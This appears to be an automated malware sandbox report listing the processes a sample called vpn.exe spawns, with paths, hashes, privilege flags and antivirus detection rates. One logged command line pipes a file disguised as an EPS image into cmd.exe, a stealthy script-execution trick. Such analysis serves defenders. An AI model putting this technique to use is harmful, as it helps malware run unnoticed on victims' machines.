                                                                                            Start time:15:12:23
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:1146832 bytes
                                                                                            MD5 hash:0FDA9A85AEDF1487A6D58E4031F72E2D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 15%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:25
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Start time:15:12:26
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:15:12:26
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:328704 bytes
                                                                                            MD5 hash:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 38%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:27
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Start time:15:12:28
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:15:12:28
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:328704 bytes
                                                                                            MD5 hash:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:15:12:29
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Start time:15:12:29
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:30
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:30
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:31
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:32
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:34
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
                                                                                            Imagebase:0x400000
                                                                                            File size:328704 bytes
                                                                                            MD5 hash:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:34
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:35
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:36
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\makecab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\makecab.exe'
                                                                                            Imagebase:0x2f0000
                                                                                            File size:68608 bytes
                                                                                            MD5 hash:D0D74264402D9F402615F22258330EC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:36
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:37
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
                                                                                            Imagebase:0x7ff724f60000
                                                                                            File size:232960 bytes
                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:15:12:38
                                                                                            Start date:12/04/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >